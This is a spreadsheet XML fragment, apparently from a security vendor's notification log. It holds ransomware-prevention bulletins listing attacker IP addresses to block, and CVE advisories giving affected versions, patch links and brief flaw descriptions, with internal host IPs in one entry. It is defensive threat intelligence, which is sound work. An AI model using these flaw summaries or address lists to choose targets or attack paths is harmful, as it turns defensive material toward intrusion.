【IOC详情】
115.190.33[.]228
104.233.254[.]106
107.148.128[.]90</t>
  </si>
  <si>
    <t>V25082110821</t>
  </si>
  <si>
    <t>115.190.33.228、104.233.254.106、107.148.128.90</t>
  </si>
  <si>
    <t>Commvault 未授权远程代码执行漏洞(CVE-2025-57790)</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到以下版本：
Commvault 11.32.102
Commvault 11.36.60
Commvault 11.38.32
下载链接：https://documentation.commvault.com/securityadvisories</t>
  </si>
  <si>
    <t>Commvault存在未授权远程代码执行漏洞，未授权的攻击者可以利用CVE-2025-57788、CVE-2025-57789、CVE-2025-57791漏洞绕过认证并实现提权，最终实现远程代码执行导致服务器失陷。</t>
  </si>
  <si>
    <t>V25082115433</t>
  </si>
  <si>
    <t>1. 影响组件：Commvault-WebServer   影响范围：11.32.0 ≤ Commvault &lt;11.32.102
11.36.0 ≤ Commvault &lt; 11.36.60
11.38.20 ≤ Commvault &lt; 11.38.32</t>
  </si>
  <si>
    <t>2025-08-21 16:32:52</t>
  </si>
  <si>
    <t>1天12时18分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250825</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250825】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC进行封堵处置。
【IOC详情】
45.192.201[.]71
104.233.252[.]29
154.92.177[.]205
104.233.252[.]1
104.233.254[.]105
154.92.177[.]194
38.33.184[.]226
117.72.212[.]147</t>
  </si>
  <si>
    <t>V25082506487</t>
  </si>
  <si>
    <t>104.233.252.29、45.192.201.71、117.72.212.147、154.92.177.194、38.33.184.226、104.233.252.1、104.233.254.105、154.92.177.205</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250826</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250826】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.33.184[.]243</t>
  </si>
  <si>
    <t>V25082605623</t>
  </si>
  <si>
    <t>38.33.184.243</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250827</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250827】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
104.233.252[.]28
45.192.200[.]142
38.33.184[.]239
104.233.252[.]27</t>
  </si>
  <si>
    <t>V25082717535</t>
  </si>
  <si>
    <t>104.233.252.28、45.192.200.142、38.33.184.239、104.233.252.27</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250828</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250828】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
45.192.200.137
154.92.177.219
38.33.184.230</t>
  </si>
  <si>
    <t>V25082806681</t>
  </si>
  <si>
    <t>45.192.200.137、154.92.177.219、38.33.184.230</t>
  </si>
  <si>
    <t>NetScaler ADC和NetScaler Gateway内存溢出漏洞CVE-2025-7775</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户更新到最新版本。
参考链接：https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694938</t>
  </si>
  <si>
    <t>NetScaler ADC和NetScaler Gateway存在内存溢出漏洞，因设备代码对特定配置下的内存缓冲区，未做严格边界校验，导致攻击者可远程发恶意请求触发内存溢出，进而实现远程控机或让服务崩溃。</t>
  </si>
  <si>
    <t>V25082814761</t>
  </si>
  <si>
    <t>1. 影响组件：Citrix NetScaler   影响范围：NetScaler ADC 14.1.* &lt; 14.1-47.48
NetScaler ADC 13.1.* &lt; 13.1-59.22
NetScaler ADC 13.1-FIPS &lt; 13.1-37.241
NetScaler ADC 13.1-NDcPP &lt; 13.1-37.241
NetScaler ADC 12.1-FIPS &lt; 12.1-55.330
NetScaler ADC 12.1-NDcPP &lt; 12.1-55.330
NetScaler Gateway &lt; 14.1-47.48
NetScaler Gateway 13.1.* &lt; 13.1-59.22</t>
  </si>
  <si>
    <t>2025-08-28 15:15:04</t>
  </si>
  <si>
    <t>1天4时12分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250829</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250829】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
45.192.202[.]213
104.233.252[.]26</t>
  </si>
  <si>
    <t>V25082906347</t>
  </si>
  <si>
    <t>45.192.202.213、104.233.252.26</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250901</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250901】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
104.233.252[.]24
104.233.252[.]25
45.192.200[.]155
45.192.200[.]148
38.33.184[.]250</t>
  </si>
  <si>
    <t>V25090106997</t>
  </si>
  <si>
    <t>45.192.200.155、45.192.200.148、104.233.252.24、104.233.252.25、38.33.184.250</t>
  </si>
  <si>
    <t>8月份（下半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>通告涵盖8月份（下半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、 网络安全政策法律动态
（一）国内政策热点
1、国务院印发《关于深入实施“人工智能+”行动的意见》
2、网安标委发布《人工智能生成合成内容标识方法 文件元数据隐式标识 文本文件》等6项网络安全标准实践指南
3、2 项 AI 内容新规从9月1号开始正式实施 9（含规定解读）
（二）国际政策热点
1、谷歌官宣组建“网络攻击部门”，美国网络安全战略转向“以攻代防”
2、微软停止向中国网络安全公司发送漏洞预警情报
3、五角大楼“封杀”微软中国工程师
二、安全热点时事资讯
（一）国内安全事件
1、歌手伍佰紧急发声：官网被黑客入侵
2、威海一公司钉钉群出现涉诈链接，5人银行卡被盗刷！
3、关注 | 新一批重点防范境外恶意网址和恶意IP公布！
（二）国际安全事件
1、麦当劳系统漏洞事件：从免费鸡块漏洞到高管数据泄露
2、美国电子制造商 Data I/O 遭勒索攻击，生产制造系统中断运营
3、谷歌确认 Gmail 密码泄露导致被黑客入侵，大多数用户需立即更换密码
4、全球八百多家家银行遭殃！77 款恶意安卓应用以 1900 万次下载量实施诈骗 
三、安全风险通告
（一）Commvault 未授权远程代码执行漏洞(CVE-2025-57790)
（二）NetScaler ADC 和 NetScaler Gateway 内存溢出漏洞(CVE-2025-7775)
四、8 月份 CNVD 漏洞收录情况
（一）漏洞分类统计
（二）漏洞趋势
附录：8月份重要漏洞信息汇总</t>
  </si>
  <si>
    <t>V25090211385</t>
  </si>
  <si>
    <t>2025-09-02 15:02:24</t>
  </si>
  <si>
    <t>1天9时31分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250903</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250903】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.14.16[.]141
38.33.184[.]233
45.192.200[.]134
38.14.16[.]150
154.92.177[.]220
104.233.252[.]2
45.200.192[.]80
45.200.192[.]69</t>
  </si>
  <si>
    <t>V25090307867</t>
  </si>
  <si>
    <t>38.14.16.150、38.14.16.141、45.200.192.69、45.200.192.80、38.33.184.233、154.92.177.220、45.192.200.134、104.233.252.2</t>
  </si>
  <si>
    <t>百度网盘Windows客户端远程命令执行漏洞</t>
  </si>
  <si>
    <t>百度已发布补丁修复该漏洞，建议受影响用户将百度网盘更新到安全版本。 百度网盘Windows 7.60.5.102 下载链接：https://pan.baidu.com/download#win</t>
  </si>
  <si>
    <t>百度网盘Windows客户端存在远程命令执行漏洞，网盘默认开启本地10000端口处理https请求，其中OpenSafeBox方法存在远程命令执行漏洞，攻击者可以利用该漏洞执行任意命令，导致系统失陷。</t>
  </si>
  <si>
    <t>V25090506721</t>
  </si>
  <si>
    <t>1. 影响组件：百度网盘   影响范围：百度网盘Windows客户端 &lt; 7.60.5.102</t>
  </si>
  <si>
    <t>2025-09-05 10:45:53</t>
  </si>
  <si>
    <t>1天2时28分</t>
  </si>
  <si>
    <t>内部威胁-&gt;僵尸网络</t>
  </si>
  <si>
    <t>僵尸网络</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250910</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250910】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
45.192.193[.]92
38.14.16[.]133
104.233.252[.]10
45.192.202[.]197
45.192.200[.]147</t>
  </si>
  <si>
    <t>V25091007829</t>
  </si>
  <si>
    <t>45.192.202.197、45.192.193.92、38.14.16.133、104.233.252.10、45.192.200.147</t>
  </si>
  <si>
    <t>微软补丁日安全通告|9月份_2025</t>
  </si>
  <si>
    <t>【漏洞详情】
【Windows NTLM 特权提升漏洞 CVE-2025-54918】
Windows NTLM是一种由微软开发的身份验证协议，主要用于在 Windows 环境中验证用户身份、保护数据完整性，以及在一定程度上加密数据传输。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高的权限。经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
【Windows SMB特权提升漏洞 CVE-2025-55234】
服务器消息块，又称网络文件共享系统，一种应用层网络传输协议，由微软开发，主要功能是使网络上的机器能够共享计算机文件、打印机、串行端口和通讯等资源。它也提供经认证的进程间通信机能。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高的权限。经过评估，危害比较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-54918
2.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55234</t>
  </si>
  <si>
    <t>V25091017022</t>
  </si>
  <si>
    <t>2025-09-10 16:42:52</t>
  </si>
  <si>
    <t>2天7时0分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250912</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250912】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.6.244[.]97
45.192.193[.]88
45.200.192[.]77
45.192.193[.]83</t>
  </si>
  <si>
    <t>V25091207956</t>
  </si>
  <si>
    <t>45.200.192.77、38.6.244.97、45.192.193.83、45.192.193.88</t>
  </si>
  <si>
    <t>严重</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250917</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250917】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.173.60[.]218
38.173.60[.]193
38.173.18[.]157
45.192.202[.]206
38.173.17[.]129
38.173.23[.]65
38.173.23[.]93
38.177.152[.]225
45.192.201[.]83
38.6.244[.]98
45.192.201[.]75</t>
  </si>
  <si>
    <t>V25091706900</t>
  </si>
  <si>
    <t>45.192.202.206、38.173.18.157、45.192.201.75、45.192.201.83、38.173.23.93、38.173.60.218、38.173.17.129、38.177.152.225、38.173.23.65、38.6.244.98、38.173.60.193</t>
  </si>
  <si>
    <t>Google Chrome V8 类型混淆漏洞(CVE-2025-10585)</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Chrome更新到最新版本。 下载链接：https://www.google.cn/chrome/</t>
  </si>
  <si>
    <t>Google Chrome V8 存在类型混淆漏洞，Chrome V8引擎对 JavaScript 对象类型的错误处理，攻击者可通过诱导用户访问恶意网页，利用该漏洞操纵浏览器内存，进而实现任意代码执行，对用户设备安全造成严重威胁。目前该漏洞已发现在野利用。</t>
  </si>
  <si>
    <t>V25091912492</t>
  </si>
  <si>
    <t>1. 影响组件：谷歌-Chrome   影响范围：Google Chrome(Windows/Mac) &lt; 140.0.7339.185/.186
Google Chrome(Linux) &lt; 140.0.7339.185</t>
  </si>
  <si>
    <t>2025-09-19 14:45:49</t>
  </si>
  <si>
    <t>1天3时47分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250919</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250919】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.173.60[.]205
38.173.21[.]61
38.173.24[.]177
38.173.16[.]90
38.6.244[.]125
154.92.177[.]209
38.177.152[.]230
38.173.24[.]164</t>
  </si>
  <si>
    <t>V25091916734</t>
  </si>
  <si>
    <t>38.177.152.230、38.173.16.90、38.173.24.177、38.173.21.61、154.92.177.209、38.6.244.125、38.173.60.205、38.173.24.164</t>
  </si>
  <si>
    <t>已推送确认，观察后无恶意行为</t>
  </si>
  <si>
    <t>11天6时22分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250924</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250924】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.173.25[.]106
38.173.25[.]113
38.173.25[.]97
38.173.26[.]111
38.173.24[.]173</t>
  </si>
  <si>
    <t>V25092407967</t>
  </si>
  <si>
    <t>38.173.25.97、38.173.26.111、38.173.24.173、38.173.25.106、38.173.25.113</t>
  </si>
  <si>
    <t>2025-10-27 09:51:43</t>
  </si>
  <si>
    <t>2天8时12分</t>
  </si>
  <si>
    <t>Spring Cloud Gateway SpEL表达式注入漏洞CVE-2025-41243</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Spring Cloud Gateway更新到最新版本。
参考链接：https://spring.io/security/cve-2025-41243</t>
  </si>
  <si>
    <t>Spring Cloud Gateway 存在注入漏洞，攻击者可以通过访问系统中注册的@systemProperties bean，修改配置属性，从而关闭限制性模式。绕过限制后，攻击者能够访问@environment等敏感bean，造成应用程序配置信息泄露，甚至实现远程代码执行。</t>
  </si>
  <si>
    <t>V25092416780</t>
  </si>
  <si>
    <t>1. 影响组件：威睿-Spring Cloud Gateway   影响范围：	
4.3.0 ≤ Spring Cloud Gateway &lt; 4.3.1
4.2.0 ≤ Spring Cloud Gateway &lt; 4.2.5
4.1.0 ≤ Spring Cloud Gateway &lt; 4.1.11
4.0.0 ≤ Spring Cloud Gateway &lt; 4.0.11
3.1.0 ≤ Spring Cloud Gateway &lt; 3.1.11</t>
  </si>
  <si>
    <t>2025-09-24 15:57:53</t>
  </si>
  <si>
    <t>1天5时5分</t>
  </si>
  <si>
    <t>内部威胁-&gt;木马</t>
  </si>
  <si>
    <t>已封堵恶意地址，查杀观察后无外联</t>
  </si>
  <si>
    <t>12天1时0分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20250926</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20250926】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
38.173.21[.]40
156.234.252[.]65
38.173.25[.]100</t>
  </si>
  <si>
    <t>V25092607072</t>
  </si>
  <si>
    <t>38.173.21.40、38.173.25.100、156.234.252.65</t>
  </si>
  <si>
    <t>用友 U8 Cloud NCCloudGatewayServlet 命令执行漏洞</t>
  </si>
  <si>
    <t>官方已发布安全补丁修复该漏洞，建议受影响升级补丁修复该漏洞。
下载链接：https://security.yonyou.com/#/patchInfo?identifier=9695976d67dd4786badf91df6cb6578c</t>
  </si>
  <si>
    <t>用友 U8 Cloud NCCloudGatewayServlet 接口存在命令执行漏洞，该漏洞源于服务端缺乏调用对象限制，允许用户反射调用危险方法导致命令执行，造成目标服务器失陷。</t>
  </si>
  <si>
    <t>V25092617027</t>
  </si>
  <si>
    <t>1. 影响组件：用友-U8-Cloud   影响范围：2.0 2.1 2.3版本
2.5 2.6 2.7 2.65版本
3.0 3.1 3.2 3.5 3.6 3.6sp版本
5.0 5.0sp 5.1 5.1sp版本</t>
  </si>
  <si>
    <t>2025-09-26 16:40:03</t>
  </si>
  <si>
    <t>0天22时52分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251009</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251009】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.56[.]231
156.234.22[.]230
156.234.56[.]226
156.234.239[.]254
23.235.182[.]123
156.234.165[.]33
156.234.126[.]174
38.173.23[.]70
38.6.244[.]100</t>
  </si>
  <si>
    <t>V25100914473</t>
  </si>
  <si>
    <t>156.234.56.231、156.234.56.226、156.234.165.33、38.6.244.100、156.234.239.254、156.234.126.174、23.235.182.123、156.234.22.230、38.173.23.70</t>
  </si>
  <si>
    <t>Redis Lua脚本远程代码执行漏洞CVE-2025-49844</t>
  </si>
  <si>
    <t>官方已修复最新版本修复该漏洞，建议受影响的Redis用户更新到8.2.2以下及以上版本。
下载链接：https://github.com/redis/redis/releases/tag/8.2.2</t>
  </si>
  <si>
    <t>Redis存在一个严重漏洞，经过认证的攻击者可以利用该漏洞通过Lua脚本触发释放后重用，执行任意代码导致服务器失陷。</t>
  </si>
  <si>
    <t>V25101006800</t>
  </si>
  <si>
    <t>192.168.1.109、172.16.6.55、172.20.34.110、192.168.1.100、192.168.1.9、172.16.5.83、192.168.4.203、172.16.5.86、192.168.4.204</t>
  </si>
  <si>
    <t>1. 影响组件：Redis   影响范围：Redis &lt; 6.2.20
7.2.0 ≤ Redis &lt; 7.2.11
7.4.0 ≤ Redis &lt; 7.4.6
8.0.0 ≤ Redis &lt; 8.0.4
8.2.0 ≤ Redis &lt; 8.2.2</t>
  </si>
  <si>
    <t>Oracle E-Business Suite 远程代码执行漏洞 CVE-2025-61882/CVE-2025-61884</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Oracle E-Business Suite更新到最新版本。 参考链接：https://www.oracle.com/security-alerts/alert-cve-2025-61882.html</t>
  </si>
  <si>
    <t>Oracle E-Business Suite 存在远程代码执行漏洞，远程未经身份验证的攻击者通过构造恶意的HTTP请求，利用漏洞链中的多个弱点（如SSRF、CRLF注入、路径穿越、XSLT注入等）逐步提升权限，成功利用后可实现远程代码执行。注意：该漏洞已出现在野利用和勒索利用。</t>
  </si>
  <si>
    <t>V25101312287</t>
  </si>
  <si>
    <t>1. 影响组件：Oracle E-Business Suite   影响范围：12.2.3 ≤ Oracle E-Business Suite ≤ 12.2.14</t>
  </si>
  <si>
    <t>2025-10-13 16:40:48</t>
  </si>
  <si>
    <t>1天1时16分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251015</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251015】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.56[.]250
156.234.37[.]240
156.234.22[.]244
156.234.101[.]158
156.234.37[.]226
23.235.181[.]161
156.234.249[.]228</t>
  </si>
  <si>
    <t>V25101507915</t>
  </si>
  <si>
    <t>156.234.101.158、156.234.56.250、156.234.249.228、156.234.37.226、156.234.22.244、23.235.181.161、156.234.37.240</t>
  </si>
  <si>
    <t>微软补丁日安全通告|10月份_2025</t>
  </si>
  <si>
    <t>【漏洞详情】
【Windows Agere 调制解调器驱动程序特权提升漏洞 CVE-2025-24990】
Windows Agere 调制解调器驱动程序是用于支持 Agere Systems生产的软调制解调器的系统组件。它的主要作用是让操作系统能够识别并正确驱动该品牌的调制解调器硬件，实现模拟电话线的拨号上网、传真发送接收等功能。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高的权限。经过评估，该漏洞存在在野利用，危害比较大，我们建议用户及时更新微软安全补丁。
【Windows 远程访问连接管理器特权提升漏洞 CVE-2025-59230】
Windows 远程访问连接管理器是 Windows 系统中的核心网络服务之一，主要用于管理计算机的远程网络连接。它负责建立、维护和终止通过拨号、VPN（虚拟专用网络）或宽带的远程访问连接。该服务为系统和应用程序提供统一的远程连接接口，使用户能够安全地访问企业网络或远程服务器。
其中存在权限提升漏洞，攻击者可以利用该漏洞在目标系统获取更高的权限。经过评估，该漏洞存在在野利用，危害比较大，我们建议用户及时更新微软安全补丁。
官方解决方案：
微软官方已更新受影响软件的安全补丁，用户可根据不同系统版本下载安装对应的安全补丁，安全更新链接如下：
1.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24990
2.https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59230</t>
  </si>
  <si>
    <t>V25101607728</t>
  </si>
  <si>
    <t>2025-10-16 10:16:58</t>
  </si>
  <si>
    <t>0天19时46分</t>
  </si>
  <si>
    <t>7-Zip目录遍历导致任意代码执行漏洞(CVE-2025-11001/CVE-2025-11002)</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将7-Zip更新到最新版本。 下载链接：https://www.7-zip.org/download.html</t>
  </si>
  <si>
    <t>7-Zip存在目录遍历漏洞，攻击者可以构造特殊的ZIP文件，其中包含指向系统关键目录的符号链接，当具有管理员权限的用户使用7-Zip解压这些恶意文件时，攻击者可以绕过正常的文件路径限制，将恶意文件写入到系统目录中，从而实现任意代码执行。</t>
  </si>
  <si>
    <t>V25101706666</t>
  </si>
  <si>
    <t>1. 影响组件：7-Zip压缩软件   影响范围：7-Zip &lt; 25.00</t>
  </si>
  <si>
    <t>2025-10-17 10:24:27</t>
  </si>
  <si>
    <t>1天5时31分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251017</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251017】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.37[.]251
156.234.22[.]249</t>
  </si>
  <si>
    <t>V25101714134</t>
  </si>
  <si>
    <t>156.234.22.249、156.234.37.251</t>
  </si>
  <si>
    <t>关于F5公司遭受高级持续性威胁（APT）事件分析</t>
  </si>
  <si>
    <t>【深信服-紧急事件通告】 
关于F5公司遭受高级持续性威胁（APT）事件分析
【事件概述】
近日，知名应用交付与安全解决方案提供商F5 Networks公开披露了一起重大安全事件。根据F5官方通告，在2025年8月，F5发现一个具有高度复杂性的国家级威胁攻击者对其内部系统进行了长期、持续的访问，并窃取了大量敏感数据（BIG-IP部分源码、BIG-IP未公开披露的漏洞信息、少量客户的配置信息）。
此次事件直接影响F5的核心产品开发环境，可能对全球使用F5产品的客户构成威胁。
【影响范围】
此次事件受影响的产品软件版本：
BIG-IP 全版本
F5OS-A
F5OS-C
BIG-IQ
【处置建议】
官方已发布最新补丁修复漏洞，建议受影响用户按照以下安全通知安装对应补丁。
F5季度安全通知链接：https://my.f5.com/manage/s/article/K000156572</t>
  </si>
  <si>
    <t>V25101718547</t>
  </si>
  <si>
    <t>Spring Cloud Gateway SpEL表达式注入漏洞 CVE-2025-41253</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Spring Cloud Gateway更新到以下版本。
Spring Cloud Gateway 4.3.2
Spring Cloud Gateway 4.2.6
Spring Cloud Gateway 4.1.12
Spring Cloud Gateway 3.1.12
下载链接：https://spring.io/security/cve-2025-41253</t>
  </si>
  <si>
    <t>Spring Cloud Gateway的SpEL存在安全校验问题，未授权的攻击者可以通过注入恶意的SpEL表达式读取环境变量或系统属性路由等敏感信息。</t>
  </si>
  <si>
    <t>V25102011834</t>
  </si>
  <si>
    <t>1. 影响组件：Spring Cloud Gateway   影响范围：4.3.0 ≤ Spring Cloud Gateway &lt; 4.3.2
4.2.0 ≤ Spring Cloud Gateway &lt; 4.2.6
4.0.0 ≤ Spring Cloud Gateway &lt; 4.1.12
0 &lt; Spring Cloud Gateway &lt; 3.1.12</t>
  </si>
  <si>
    <t>2025-10-20 16:04:54</t>
  </si>
  <si>
    <t>1天4时7分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251022</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251022】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
23.226.55[.]106
103.48.133[.]98
43.249.172[.]105</t>
  </si>
  <si>
    <t>V25102210305</t>
  </si>
  <si>
    <t>43.249.172.105、23.226.55.106、103.48.133.98</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251024</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251024】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.205[.]161
103.44.90[.]66</t>
  </si>
  <si>
    <t>V25102411092</t>
  </si>
  <si>
    <t>103.44.90.66、156.234.205.161</t>
  </si>
  <si>
    <t>10月份（上半月刊）安全通告_2025</t>
  </si>
  <si>
    <t>通告涵盖10月份（上半月刊）新增安全漏洞和安全事件的分析等。整理的具体内容包含以下几个方面：
一、网络安全政策法律动态        
（一）国内政策热点         
1、《数据安全技术 个人信息跨境处理活动安全认证要求》国家标准正式发布        
2、中央网信办、国家发展改革委印发《政务领域人工智能大模型部署应用指引》        
3、网安标委就《网络安全标准实践指南——数据库联网安全要求》公开征求意见        
（二）国际政策热点        
1、美国国务院发布2026版《企业数据与人工智能战略》        
2、美国白宫科技政策办公室就AI监管向公众征求意见        
3、印度启动“遏制网络欺诈”计划        
二、安全热点时事资讯        
（一）国内安全事件        
1、守护“北京时间”！国家安全机关破获美国国家安全局重大网络攻击案        
2、疑遭网络攻击，香港数百家便利店支付及会员服务瘫痪        
3、小米通报“小米车主遭网络攻击”新进展：已有480人提供相关证据        
（二）国际安全事件        
1、AI聊天应用存在安全配置漏洞，致 40 万用户隐私信息、对话数据泄露        
2、大众汽车遭8Base勒索团伙攻击，敏感数据疑遭窃取        
3、欧机场遭遇网络攻击暴露全球民航业供应链安全漏洞        
4、黑客组织勒索39家企业，泄露思科、谷歌及全球航空公司失窃数据        
三、安全风险通告        
（一）Redis Lua脚本远程代码执行漏洞(CVE-2025-49844)        
四、微软安全通告        
（一）漏洞概要        
（二）漏洞数据分析        
（三）重要漏洞分析</t>
  </si>
  <si>
    <t>V25102707875</t>
  </si>
  <si>
    <t>2025-10-27 10:53:53</t>
  </si>
  <si>
    <t>0天20时55分</t>
  </si>
  <si>
    <t xml:space="preserve">Windows 服务器更新服务 (WSUS) 远程代码执行漏洞(CVE-2025-59287) </t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Windows Server更新最新版本。
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287</t>
  </si>
  <si>
    <t>未经身份验证的远程攻击者可以发送特制的事件，触发传统序列化机制中不安全的对象反序列化，从而导致远程代码执行。</t>
  </si>
  <si>
    <t>V25102810064</t>
  </si>
  <si>
    <t>1. 影响组件：Windows Server   影响范围：Windows Server 2025 (Server Core installation)
Windows Server 2025
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012</t>
  </si>
  <si>
    <t>2025-10-28 14:57:58</t>
  </si>
  <si>
    <t>1天22时27分</t>
  </si>
  <si>
    <t>勒索预防情报速递_20251029</t>
  </si>
  <si>
    <t>【勒索预防情报速递_20251029】 
尊敬的用户，您好，近日深信服云端安全团队，发现勒索组织面向公网发起批量扫描行为，为防止服务器被勒索加密，建议针对以下IOC在出口防火墙进行封堵处置。
【IOC详情】
156.234.97[.]57
156.234.94[.]36
43.249.172[.]108
156.234.94[.]35
156.234.94[.]44
156.234.94[.]40
156.234.94[.]45</t>
  </si>
  <si>
    <t>V25102907232</t>
  </si>
  <si>
    <t>156.234.97.57、156.234.94.44、156.234.94.40、43.249.172.108、156.234.94.45、156.234.94.35、156.234.94.36</t>
  </si>
  <si>
    <t>2025-11-03 08:59:11</t>
  </si>
  <si>
    <t>2天17时27分</t>
  </si>
  <si>
    <t>Apache Tomcat RewriteValve 目录遍历漏洞 (CVE-2025-55752)</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Apache-Tomcat更新到最新版本。
参考链接：https://lists.apache.org/thread/n05kjcwyj1s45ovs8ll1qrrojhfb1tog</t>
  </si>
  <si>
    <t>Apache Tomcat 存在目录遍历漏洞 ，因修复旧漏洞时引入回归缺陷，导致重写后的 URL 先规范化再解码，攻击者可借助 URL 重写规则操纵请求 URI，绕过对/WEB-INF/、/META-INF/等敏感目录的保护；若服务器同时启用 HTTP PUT 请求，攻击者还能上传恶意文件，最终实现远程代码执行。</t>
